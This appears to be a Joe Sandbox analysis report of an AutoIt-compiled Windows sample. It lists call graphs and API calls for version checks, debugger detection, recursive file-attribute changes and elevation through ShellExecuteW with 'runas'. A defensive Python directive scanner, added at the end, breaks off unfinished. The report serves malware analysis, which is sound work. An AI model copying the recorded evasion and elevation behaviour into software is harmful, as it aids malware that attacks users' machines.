99719->99722 99723 e836ad 99722->99723 99724 e83711 99723->99724 99725 e836b2 99723->99725 99766 e8370f 99723->99766 99727 ec3dce 99724->99727 99728 e83717 99724->99728 99729 e8378b PostQuitMessage 99725->99729 99730 e836bf 99725->99730 99726 e836f6 DefWindowProcW 99732 e83690 99726->99732 99778 e82f24 10 API calls 99727->99778 99733 e8371e 99728->99733 99734 e83743 SetTimer RegisterWindowMessageW 99728->99734 99729->99732 99735 e836ca 99730->99735 99736 ec3e3b 99730->99736 99742 ec3d6f 99733->99742 99743 e83727 KillTimer 99733->99743 99734->99732 99737 e8376c CreatePopupMenu 99734->99737 99738 e836d4 99735->99738 99739 e83795 99735->99739 99783 eec80c 65 API calls ___scrt_fastfail 99736->99783 99737->99732 99744 e836df 99738->99744 99745 ec3e20 99738->99745 99767 e9fcbb 99739->99767 99741 ec3def 99779 e9f1c6 40 API calls 99741->99779 99749 ec3daa MoveWindow 99742->99749 99750 ec3d74 99742->99750 99774 e8388e Shell_NotifyIconW ___scrt_fastfail 99743->99774 99752 e83779 99744->99752 99753 e836ea 99744->99753 99745->99726 99782 ee1367 8 API calls 99745->99782 99746 ec3e4d 99746->99726 99746->99732 99749->99732 99754 ec3d99 SetFocus 99750->99754 99755 ec3d7a 99750->99755 99776 e837a6 75 API calls ___scrt_fastfail 99752->99776 99753->99726 99780 e8388e Shell_NotifyIconW ___scrt_fastfail 99753->99780 99754->99732 99755->99753 99758 ec3d83 99755->99758 99756 e8373a 99775 e8572c DeleteObject DestroyWindow 99756->99775 99777 e82f24 10 API calls 99758->99777 99761 e83789 99761->99732 99764 ec3e14 99781 e838f2 60 API calls ___scrt_fastfail 99764->99781 99766->99726 99768 e9fd59 99767->99768 99769 e9fcd3 ___scrt_fastfail 99767->99769 99768->99732 99784 e85f59 99769->99784 99771 e9fcfa 99772 e9fd42 KillTimer SetTimer 99771->99772 99773 edfdcb Shell_NotifyIconW 99771->99773 99772->99768 99773->99772 99774->99756 99775->99732 99776->99761 99777->99732 99778->99741 99779->99753 99780->99764 99781->99766 99782->99766 99783->99746 99785 e86058 99784->99785 99786 e85f76 99784->99786 
99785->99771 99787 e87a14 8 API calls 99786->99787 99788 e85f84 99787->99788 99789 e85f91 99788->99789 99790 ec5101 LoadStringW 99788->99790 99791 e884b7 8 API calls 99789->99791 99793 ec511b 99790->99793 99792 e85fa6 99791->99792 99794 e85fb3 99792->99794 99801 ec5137 99792->99801 99796 e8be6d 8 API calls 99793->99796 99799 e85fd9 ___scrt_fastfail 99793->99799 99794->99793 99795 e85fbd 99794->99795 99797 e865a4 8 API calls 99795->99797 99796->99799 99798 e85fcb 99797->99798 99800 e87af4 8 API calls 99798->99800 99803 e8603e Shell_NotifyIconW 99799->99803 99800->99799 99801->99799 99802 ec517a 99801->99802 99804 e8bf07 8 API calls 99801->99804 99815 e9fe8f 51 API calls 99802->99815 99803->99785 99805 ec5161 99804->99805 99814 eea265 9 API calls 99805->99814 99808 ec516c 99810 e87af4 8 API calls 99808->99810 99809 ec5199 99811 e865a4 8 API calls 99809->99811 99810->99802 99812 ec51aa 99811->99812 99813 e865a4 8 API calls 99812->99813 99813->99799 99814->99808 99815->99809 99816 ede5f8 GetUserNameW 99817 ede610 99816->99817 99818 e8f470 99821 e99fa5 99818->99821 99820 e8f47c 99822 e99fc6 99821->99822 99827 e9a023 99821->99827 99824 e902f0 253 API calls 99822->99824 99822->99827 99828 e99ff7 99824->99828 99825 ed800f 99825->99825 99826 e9a067 99826->99820 99827->99826 99830 ef3ef6 81 API calls __wsopen_s 99827->99830 99828->99826 99828->99827 99829 e8be6d 8 API calls 99828->99829 99829->99827 99830->99825 99831 ed55f4 99832 e9e34f 8 API calls 99831->99832 99833 ed560a 99832->99833 99835 ed5685 99833->99835 99840 e9a9e5 9 API calls 99833->99840 99838 ed617b 99835->99838 99842 ef3ef6 81 API calls __wsopen_s 99835->99842 99837 ed5665 99837->99835 99841 ef2393 8 API calls 99837->99841 99840->99837 99841->99835 99842->99838 99843 eb8792 99848 eb854e 99843->99848 99847 eb87ba 99849 eb857f try_get_first_available_module 99848->99849 99854 ea919b 40 API calls 99849->99854 99859 eb86c8 99849->99859 99851 eb877e 99864 eb2b7c 26 API calls __wsopen_s 99851->99864 99853 eb86d3 
99853->99847 99860 ec0d24 99853->99860 99855 eb871c 99854->99855 99856 ea919b 40 API calls 99855->99856 99855->99859 99857 eb873b 99856->99857 99858 ea919b 40 API calls 99857->99858 99857->99859 99858->99859 99859->99853 99863 eaf669 20 API calls _free 99859->99863 99865 ec0421 99860->99865 99862 ec0d3f 99862->99847 99863->99851 99864->99853 99867 ec042d __FrameHandler3::FrameUnwindToState 99865->99867 99866 ec043b 99923 eaf669 20 API calls _free 99866->99923 99867->99866 99869 ec0474 99867->99869 99876 ec09fb 99869->99876 99870 ec0440 99924 eb2b7c 26 API calls __wsopen_s 99870->99924 99875 ec044a __wsopen_s 99875->99862 99926 ec07cf 99876->99926 99879 ec0a2d 99958 eaf656 20 API calls _free 99879->99958 99880 ec0a46 99944 eb55b1 99880->99944 99883 ec0a32 99959 eaf669 20 API calls _free 99883->99959 99884 ec0a4b 99885 ec0a6b 99884->99885 99886 ec0a54 99884->99886 99957 ec073a CreateFileW 99885->99957 99960 eaf656 20 API calls _free 99886->99960 99890 ec0498 99925 ec04c1 LeaveCriticalSection __wsopen_s 99890->99925 99891 ec0a59 99961 eaf669 20 API calls _free 99891->99961 99892 ec0b21 GetFileType 99895 ec0b2c GetLastError 99892->99895 99896 ec0b73 99892->99896 99894 ec0af6 GetLastError 99963 eaf633 20 API calls 2 library calls 99894->99963 99964 eaf633 20 API calls 2 library calls 99895->99964 99966 eb54fa 21 API calls 3 library calls 99896->99966 99897 ec0aa4 99897->99892 99897->99894 99962 ec073a CreateFileW 99897->99962 99901 ec0b3a CloseHandle 99901->99883 99904 ec0b63 99901->99904 99903 ec0ae9 99903->99892 99903->99894 99965 eaf669 20 API calls _free 99904->99965 99905 ec0b94 99907 ec0be0 99905->99907 99967 ec094b 72 API calls 4 library calls 99905->99967 99912 ec0c0d 99907->99912 99968 ec04ed 72 API calls 4 library calls 99907->99968 99908 ec0b68 99908->99883 99911 ec0c06 99911->99912 99913 ec0c1e 99911->99913 99969 eb8a3e 99912->99969 99913->99890 99915 ec0c9c CloseHandle 99913->99915 99984 ec073a CreateFileW 99915->99984 99917 ec0cc7 99918 ec0cd1 GetLastError 
99917->99918 99919 ec0cfd 99917->99919 99985 eaf633 20 API calls 2 library calls 99918->99985 99919->99890 99921 ec0cdd 99986 eb56c3 21 API calls 3 library calls 99921->99986 99923->99870 99924->99875 99925->99875 99927 ec080a 99926->99927 99928 ec07f0 99926->99928 99987 ec075f 99927->99987 99928->99927 99994 eaf669 20 API calls _free 99928->99994 99931 ec07ff 99995 eb2b7c 26 API calls __wsopen_s 99931->99995 99933 ec0842 99934 ec0871 99933->99934 99996 eaf669 20 API calls _free 99933->99996 99942 ec08c4 99934->99942 99998 eada9d 26 API calls 2 library calls 99934->99998 99937 ec08bf 99939 ec093e 99937->99939 99937->99942 99938 ec0866 99997 eb2b7c 26 API calls __wsopen_s 99938->99997 99999 eb2b8c 11 API calls _abort 99939->99999 99942->99879 99942->99880 99943 ec094a 99945 eb55bd __FrameHandler3::FrameUnwindToState 99944->99945 100002 eb32ee EnterCriticalSection 99945->100002 99947 eb560b 100003 eb56ba 99947->100003 99949 eb55e9 100006 eb5390 21 API calls 2 library calls 99949->100006 99950 eb55c4 99950->99947 99950->99949 99954 eb5657 EnterCriticalSection 99950->99954 99952 eb5634 __wsopen_s 99952->99884 99953 eb55ee 99953->99947 100007 eb54d7 EnterCriticalSection 99953->100007 99954->99947 99956 eb5664 LeaveCriticalSection 99954->99956 99956->99950 99957->99897 99958->99883 99959->99890 99960->99891 99961->99883 99962->99903 99963->99883 99964->99901 99965->99908 99966->99905 99967->99907 99968->99911 99970 eb5754 __wsopen_s 26 API calls 99969->99970 99972 eb8a4e 99970->99972 99971 eb8a54 100009 eb56c3 21 API calls 3 library calls 99971->100009 99972->99971 99973 eb8a86 99972->99973 99975 eb5754 __wsopen_s 26 API calls 99972->99975 99973->99971 99976 eb5754 __wsopen_s 26 API calls 99973->99976 99978 eb8a7d 99975->99978 99979 eb8a92 CloseHandle 99976->99979 99977 eb8aac 99980 eb8ace 99977->99980 100010 eaf633 20 API calls 2 library calls 99977->100010 99981 eb5754 __wsopen_s 26 API calls 99978->99981 99979->99971 99982 eb8a9e GetLastError 99979->99982 99980->99890 
99981->99973 99982->99971 99984->99917 99985->99921 99986->99919 99990 ec0777 99987->99990 99988 ec0792 99988->99933 99990->99988 100000 eaf669 20 API calls _free 99990->100000 99991 ec07b6 100001 eb2b7c 26 API calls __wsopen_s 99991->100001 99993 ec07c1 99993->99933 99994->99931 99995->99927 99996->99938 99997->99934 99998->99937 99999->99943 100000->99991 100001->99993 100002->99950 100008 eb3336 LeaveCriticalSection 100003->100008 100005 eb56c1 100005->99952 100006->99953 100007->99947 100008->100005 100009->99977 100010->99980 100011 e81033 100016 e86686 100011->100016 100015 e81042 100017 e8bf07 8 API calls 100016->100017 100018 e866f4 100017->100018 100024 e855cc 100018->100024 100021 e86791 100022 e81038 100021->100022 100027 e868e6 8 API calls __fread_nolock 100021->100027 100023 ea0433 29 API calls __onexit 100022->100023 100023->100015 100028 e855f8 100024->100028 100027->100021 100029 e855eb 100028->100029 100030 e85605 100028->100030 100029->100021 100030->100029 100031 e8560c RegOpenKeyExW 100030->100031 100031->100029 100032 e85626 RegQueryValueExW 100031->100032 100033 e8565c RegCloseKey 100032->100033 100034 e85647 100032->100034 100033->100029 100034->100033 100035 ed3fb3 100051 e8ee60 ISource 100035->100051 100036 e8f1c1 PeekMessageW 100036->100051 100037 e8eeb7 GetInputState 100037->100036 100037->100051 100038 ed3271 TranslateAcceleratorW 100038->100051 100040 e8f23f PeekMessageW 100040->100051 100041 e8f0b4 timeGetTime 100041->100051 100042 e8f223 TranslateMessage DispatchMessageW 100042->100040 100043 e8f25f Sleep 100043->100051 100044 ed4127 Sleep 100058 ed4004 100044->100058 100046 ed338d timeGetTime 100104 e9a9e5 9 API calls 100046->100104 100048 eedc9c 46 API calls 100048->100058 100050 ed41be GetExitCodeProcess 100053 ed41ea CloseHandle 100050->100053 100054 ed41d4 WaitForSingleObject 100050->100054 100051->100036 100051->100037 100051->100038 100051->100040 100051->100041 100051->100042 100051->100043 100051->100044 100051->100046 100057 
e8f085 100051->100057 100051->100058 100064 e902f0 253 API calls 100051->100064 100065 e92ad0 253 API calls 100051->100065 100067 e8f400 100051->100067 100075 e8f680 100051->100075 100098 e9f2a5 100051->100098 100103 e9f27e timeGetTime 100051->100103 100105 ef4384 8 API calls 100051->100105 100106 ef3ef6 81 API calls __wsopen_s 100051->100106 100052 f1331e GetForegroundWindow 100052->100058 100053->100058 100054->100051 100054->100053 100056 ed3cf5 100056->100057 100058->100048 100058->100050 100058->100051 100058->100052 100058->100056 100059 ed425c Sleep 100058->100059 100107 f05fb5 8 API calls 100058->100107 100108 eef1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100058->100108 100109 e9f27e timeGetTime 100058->100109 100059->100051 100064->100051 100065->100051 100068 e8f411 100067->100068 100069 e8f41f 100068->100069 100071 e8f433 100068->100071 100110 e8e910 100069->100110 100142 ef3ef6 81 API calls __wsopen_s 100071->100142 100072 e8f42a 100072->100051 100074 ed4528 100074->100074 100076 e8f6c0 100075->100076 100092 e8f78c ISource 100076->100092 100151 ea05d2 5 API calls __Init_thread_wait 100076->100151 100079 ed457d 100081 e8bf07 8 API calls 100079->100081 100079->100092 100080 e8bf07 8 API calls 100080->100092 100084 ed4597 100081->100084 100082 e8bdc1 39 API calls 100082->100092 100152 ea0433 29 API calls __onexit 100084->100152 100086 ed45a1 100153 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100086->100153 100090 e902f0 253 API calls 100090->100092 100091 e8be6d 8 API calls 100091->100092 100092->100080 100092->100082 100092->100090 100092->100091 100093 e8fa91 100092->100093 100094 e91c50 8 API calls 100092->100094 100095 ef3ef6 81 API calls 100092->100095 100150 e9b2d6 253 API calls 100092->100150 100154 ea05d2 5 API calls __Init_thread_wait 100092->100154 100155 ea0433 29 API calls __onexit 100092->100155 100156 ea0588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 
100092->100156 100157 f05131 101 API calls 100092->100157 100158 f0721e 253 API calls 100092->100158 100093->100051 100094->100092 100095->100092 100100 e9f2b8 100098->100100 100101 e9f2c1 100098->100101 100099 e9f2e5 IsDialogMessageW 100099->100100 100099->100101 100100->100051 100101->100099 100101->100100 100102 edf83b GetClassLongW 100101->100102 100102->100099 100102->100101 100103->100051 100104->100051 100105->100051 100106->100051 100107->100058 100108->100058 100109->100058 100111 e902f0 253 API calls 100110->100111 100129 e8e94d 100111->100129 100112 ed3176 100149 ef3ef6 81 API calls __wsopen_s 100112->100149 100114 e8e9bb ISource 100114->100072 100115 e8ed85 100115->100114 100124 ea019b 8 API calls 100115->100124 100116 e8ea73 100116->100115 100118 e8ea7e 100116->100118 100117 e8ecaf 100120 ed3167 100117->100120 100121 e8ecc4 100117->100121 100119 ea016b 8 API calls 100118->100119 100131 e8ea85 __fread_nolock 100119->100131 100148 f06062 8 API calls 100120->100148 100126 ea016b 8 API calls 100121->100126 100122 e8eb68 100127 ea019b 8 API calls 100122->100127 100123 ea016b 8 API calls 100123->100129 100124->100131 100134 e8eb1a 100126->100134 100137 e8ead9 ISource __fread_nolock 100127->100137 100128 ea016b 8 API calls 100130 e8eaa6 100128->100130 100129->100112 100129->100114 100129->100115 100129->100116 100129->100122 100129->100123 100129->100137 100130->100137 100143 e8d210 253 API calls 100130->100143 100131->100128 100131->100130 100133 ed3156 100147 ef3ef6 81 API calls __wsopen_s 100133->100147 100134->100072 100137->100117 100137->100133 100137->100134 100138 ed3131 100137->100138 100140 ed310f 100137->100140 100144 e84485 253 API calls 100137->100144 100146 ef3ef6 81 API calls __wsopen_s 100138->100146 100145 ef3ef6 81 API calls __wsopen_s 100140->100145 100142->100074 100143->100137 100144->100137 100145->100134 100146->100134 100147->100134 100148->100112 100149->100114 100150->100092 100151->100079 100152->100086 100153->100092 100154->100092 
100155->100092 100156->100092 100157->100092 100158->100092

                                              Control-flow Graph

                                              control_flow_graph 514 e85d78-e85de7 call e8bf07 GetVersionExW call e884b7 519 ec4f0c-ec4f1f 514->519 520 e85ded 514->520 521 ec4f20-ec4f24 519->521 522 e85def-e85df1 520->522 525 ec4f26 521->525 526 ec4f27-ec4f33 521->526 523 ec4f4b 522->523 524 e85df7-e85e56 call e896d9 call e879ed 522->524 529 ec4f52-ec4f5e 523->529 538 ec50ad-ec50b4 524->538 539 e85e5c-e85e5e 524->539 525->526 526->521 528 ec4f35-ec4f37 526->528 528->522 531 ec4f3d-ec4f44 528->531 532 e85ecc-e85ee6 GetCurrentProcess IsWow64Process 529->532 531->519 534 ec4f46 531->534 536 e85ee8 532->536 537 e85f45-e85f4b 532->537 534->523 540 e85eee-e85efa 536->540 537->540 543 ec50d4-ec50d7 538->543 544 ec50b6 538->544 541 ec4fae-ec4fc1 539->541 542 e85e64-e85e67 539->542 545 e85f00-e85f0f LoadLibraryA 540->545 546 ec50f2-ec50f6 GetSystemInfo 540->546 547 ec4fea-ec4fec 541->547 548 ec4fc3-ec4fcc 541->548 542->532 549 e85e69-e85eab 542->549 551 ec50d9-ec50e8 543->551 552 ec50c2-ec50ca 543->552 550 ec50bc 544->550 553 e85f4d-e85f57 GetSystemInfo 545->553 554 e85f11-e85f1f GetProcAddress 545->554 560 ec4fee-ec5003 547->560 561 ec5021-ec5024 547->561 557 ec4fce-ec4fd4 548->557 558 ec4fd9-ec4fe5 548->558 549->532 559 e85ead-e85eb0 549->559 550->552 551->550 562 ec50ea-ec50f0 551->562 552->543 556 e85f27-e85f29 553->556 554->553 555 e85f21-e85f25 GetNativeSystemInfo 554->555 555->556 563 e85f2b-e85f2c FreeLibrary 556->563 564 e85f32-e85f44 556->564 557->532 558->532 565 e85eb6-e85ec0 559->565 566 ec4f63-ec4f6d 559->566 567 ec5005-ec500b 560->567 568 ec5010-ec501c 560->568 569 ec505f-ec5062 561->569 570 ec5026-ec5041 561->570 562->552 563->564 565->529 576 e85ec6 565->576 573 ec4f6f-ec4f7b 566->573 574 ec4f80-ec4f8a 566->574 567->532 568->532 569->532 575 ec5068-ec508f 569->575 571 ec504e-ec505a 570->571 572 ec5043-ec5049 570->572 571->532 572->532 573->532 577 ec4f8c-ec4f98 574->577 578 ec4f9d-ec4fa9 574->578 579 ec509c-ec50a8 575->579 580 ec5091-ec5097 575->580 
576->532 577->532 578->532 579->532 580->532
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00E85DA7
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              • GetCurrentProcess.KERNEL32(?,00F1DC2C,00000000,?,?), ref: 00E85ED3
                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00E85EDA
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E85F05
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E85F17
                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00E85F25
                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E85F2C
                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00E85F51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                              • API String ID: 3290436268-3101561225
                                              • Opcode ID: f32c7b416ddb79693b9bf361df4a38f80e70742ba98c025a09e255d77169f14d
                                              • Instruction ID: f1aa9502fa0e46a1bd6ffdf0f4c170a17813d88336cfc15ce07cc41913004f2a
                                              • Opcode Fuzzy Hash: f32c7b416ddb79693b9bf361df4a38f80e70742ba98c025a09e255d77169f14d
                                              • Instruction Fuzzy Hash: A3A1D63390A7C8CFC755DBAC7D415D93FA46F27306B046A9CD688B3262CA294949FB31

                                              Control-flow Graph

                                              control_flow_graph 581 ef9f9f-ef9fc7 FindFirstFileW 582 efa03a-efa045 FindClose 581->582 583 ef9fc9-ef9fde call ea55c2 581->583 584 efa04b-efa05e FindFirstFileW 582->584 585 efa0e2 582->585 593 efa028-efa038 FindNextFileW 583->593 594 ef9fe0-ef9ff5 call ea55c2 583->594 587 efa0d9 584->587 588 efa060-efa066 584->588 589 efa0e4-efa0e8 585->589 591 efa0db-efa0dc FindClose 587->591 592 efa069-efa070 588->592 591->585 595 efa0c7-efa0d7 FindNextFileW 592->595 596 efa072-efa087 call ea55c2 592->596 593->582 593->583 594->593 601 ef9ff7-efa020 GetFileAttributesW SetFileAttributesW 594->601 595->587 595->592 596->595 602 efa089-efa09e call ea55c2 596->602 603 efa0eb-efa0f4 FindClose 601->603 604 efa026 601->604 602->595 607 efa0a0-efa0be SetCurrentDirectoryW call ef9f9f 602->607 603->589 604->593 610 efa0f6-efa0f8 607->610 611 efa0c0-efa0c5 SetCurrentDirectoryW 607->611 610->591 611->595
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,?,75918FB0,?,00000000), ref: 00EF9FC0
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00EF9FFE
                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 00EFA018
                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 00EFA030
                                              • FindClose.KERNEL32(00000000), ref: 00EFA03B
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00EFA057
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00EFA0A7
                                              • SetCurrentDirectoryW.KERNEL32(00F47B94), ref: 00EFA0C5
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EFA0CF
                                              • FindClose.KERNEL32(00000000), ref: 00EFA0DC
                                              • FindClose.KERNEL32(00000000), ref: 00EFA0EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                              • String ID: *.*
                                              • API String ID: 1409584000-438819550
                                              • Opcode ID: 11aafc5b1fbec77c0f74e210862f7d0faa7b61a15328f4bcc1be88dfed2be068
                                              • Instruction ID: 54f40424307cc9c4e7de4714ac794f8ddba5244d1705bcd5e7f265d39193d20c
                                              • Opcode Fuzzy Hash: 11aafc5b1fbec77c0f74e210862f7d0faa7b61a15328f4bcc1be88dfed2be068
                                              • Instruction Fuzzy Hash: 1631D57260031D6BDB10AFB4EC49AEE77BCAF09324F1480A5F919F7090DF75DA44AA52

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E832EF,?), ref: 00E83342
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E832EF,?), ref: 00E83355
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F52418,00F52400,?,?,?,?,?,?,00E832EF,?), ref: 00E833C1
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                                • Part of subcall function 00E841E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E833E9,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E84227
                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E83442
                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00EC3C8A
                                              • SetCurrentDirectoryW.KERNEL32(?,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00EC3CCB
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F431F4,00F52418,?,?,?,?,?,?,?,00E832EF), ref: 00EC3D54
                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EC3D5B
                                                • Part of subcall function 00E8345A: GetSysColorBrush.USER32(0000000F), ref: 00E83465
                                                • Part of subcall function 00E8345A: LoadCursorW.USER32(00000000,00007F00), ref: 00E83474
                                                • Part of subcall function 00E8345A: LoadIconW.USER32(00000063), ref: 00E8348A
                                                • Part of subcall function 00E8345A: LoadIconW.USER32(000000A4), ref: 00E8349C
                                                • Part of subcall function 00E8345A: LoadIconW.USER32(000000A2), ref: 00E834AE
                                                • Part of subcall function 00E8345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E834C6
                                                • Part of subcall function 00E8345A: RegisterClassExW.USER32(?), ref: 00E83517
                                                • Part of subcall function 00E8353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E83568
                                                • Part of subcall function 00E8353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E83589
                                                • Part of subcall function 00E8353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E8359D
                                                • Part of subcall function 00E8353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E832EF,?), ref: 00E835A6
                                                • Part of subcall function 00E838F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E839C3
                                              Strings
                                              • AutoIt, xrefs: 00EC3C7F
                                              • runas, xrefs: 00EC3D4F
                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00EC3C84
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                              • API String ID: 683915450-2030392706
                                              • Opcode ID: 1a79f5a1921e348f4d4c9f10123798c81d641e800bd117a7ce9746cfd25e6374
                                              • Instruction ID: 9f8cb95555462e8023188a70b378af48429d2bf862c419aca0854d1108ac8882
                                              • Opcode Fuzzy Hash: 1a79f5a1921e348f4d4c9f10123798c81d641e800bd117a7ce9746cfd25e6374
                                              • Instruction Fuzzy Hash: 5151D431108349AAC705FF70DC05DAEBBE89B92705F40652CF59D761A3DB648A4AE723
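The startup path in this record (IsDebuggerPresent, the AutoIt EULA MessageBoxA, then ShellExecuteW reached with the "runas" verb) is the AutoIt runtime acting on the compiled script's directives: "runas" is how #requireadmin re-launches the interpreter elevated, and the same directive family (#notrayicon, #include, #OnAutoItStartRegister, #pragma compile, #cs/#ce) appears in the parser's string table later in this report. Once the embedded script has been recovered from the injector, scanning its preamble for these directives tells you what the runtime will do before the first script statement executes. The scanner below is an added example, not code from the report, from Joe Sandbox or from AutoIt; the sample script is constructed, and the per-directive triage notes are my own annotations.

```python
import re
from dataclasses import dataclass, field

# Block-comment and directive keywords as the runtime's parser names them
# (they appear verbatim in the directive parser's string table in this report).
BLOCK_COMMENT_OPEN = ("#cs", "#comments-start")
BLOCK_COMMENT_CLOSE = ("#ce", "#comments-end")

# Triage meaning of each directive (my own annotations, not AutoIt documentation text).
DIRECTIVE_NOTES = {
    "#requireadmin": "runtime re-launches itself with the 'runas' verb (elevation prompt)",
    "#notrayicon": "suppresses the AutoIt tray icon",
    "#onautoitstartregister": "named function runs before the script body",
    "#pragma": "compile-time options (icon, version info, x64, UPX)",
    "#include": "pulls another script into this one",
    "#include-once": "include guard",
}

_DIRECTIVE_RE = re.compile(r"^(#[A-Za-z][\w-]*)\s*(.*?)\s*$")


@dataclass
class ScanResult:
    directives: list = field(default_factory=list)  # (line_no, name, argument)
    includes: list = field(default_factory=list)    # targets of parsable #include lines
    errors: list = field(default_factory=list)      # (line_no, message)


def scan_directives(script: str) -> ScanResult:
    """Collect directives from an AutoIt source, skipping #cs/#ce blocks and ';' comments.

    The error strings mirror the runtime's own ('Unterminated group of comments',
    'Cannot parse #include') so findings line up with what the interpreter reports.
    """
    result = ScanResult()
    depth = 0  # block comments may nest; track depth rather than a flag
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        first = line.split()[0].lower()
        if first in BLOCK_COMMENT_OPEN:
            depth += 1
            continue
        if first in BLOCK_COMMENT_CLOSE:
            if depth == 0:
                result.errors.append((no, "comment block closed but never opened"))
            else:
                depth -= 1
            continue
        if depth > 0 or line.startswith(";"):
            continue
        m = _DIRECTIVE_RE.match(line)
        if not m:
            continue  # ordinary script statement
        name = m.group(1).lower()
        arg = m.group(2).split(";", 1)[0].strip()  # drop a trailing line comment
        if name == "#include":
            # The runtime accepts <file.au3> or "file.au3"; anything else is a parse error.
            inc = re.fullmatch(r'[<"]([^<>"]+)[>"]', arg)
            if inc:
                result.includes.append(inc.group(1))
            else:
                result.errors.append((no, "Cannot parse #include: " + arg))
        result.directives.append((no, name, arg))
    if depth > 0:
        result.errors.append((None, "Unterminated group of comments"))
    return result


def triage_notes(result: ScanResult) -> list:
    """One line per directive that changes how the runtime behaves before the script runs."""
    return [
        f"line {no}: {name} {arg}".rstrip() + " -> " + DIRECTIVE_NOTES[name]
        for no, name, arg in result.directives
        if name in DIRECTIVE_NOTES
    ]


# Constructed sample in the shape of a decompiled AutoIt injector's preamble.
SAMPLE_SCRIPT = """\
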